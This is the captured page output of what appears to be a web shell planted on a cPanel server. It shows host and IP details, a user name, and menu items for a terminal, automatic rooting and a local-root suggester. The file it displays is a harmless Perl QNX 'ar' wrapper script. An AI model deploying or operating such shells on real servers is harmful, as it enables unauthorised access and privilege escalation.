Linux cpanel2.daytoncreative.net 2.6.32-754.29.2.el6.x86_64 #1 SMP Tue May 12 17:39:04 UTC 2020 x86_64
Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
Server IP : 70.62.220.67 & Your IP : 216.73.216.193
Domains :
Cant Read [ /etc/named.conf ]
User : michaelgreg
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
log /
perl-5.20.2 /
qnx /
Delete
Unzip
Name
Size
Permission
Date
Action
ar
850
B
-r--r--r--
2014-12-27 11:49
cpp
573
B
-r--r--r--
2014-12-27 11:49
qnx.c
253
B
-r--r--r--
2014-12-27 11:49
Save
Rename
#! /bin/sh #__USAGE #%C key library name ... # Crude cover for wlib to be compatible with ar # Supports the following key letters: # qcru # ru replace existing modules. u indicates only replace # those which are newer # c create the library (kinda moot) # q quickly append to the end. # #This is a crude cover, but it has proved sufficient for many #ports. Rather than attempt to implement subtleties of the #ar syntax, I simply create a new library under all #circumstances. # #Note that Watcom 10.6 supports ar directly, so this #cover is not necessary. # #Increased the record size to 32 to accommodate a large library #in the perl 5.003 distribution # #Submitted by Norton T. Allen (allen@huarp.harvard.edu) if [ $# -lt 3 ]; then use $0 exit 1 fi shift library=$1 shift wlib -p=32 -n $library `for i in $*; do echo "+$i \\c"; done`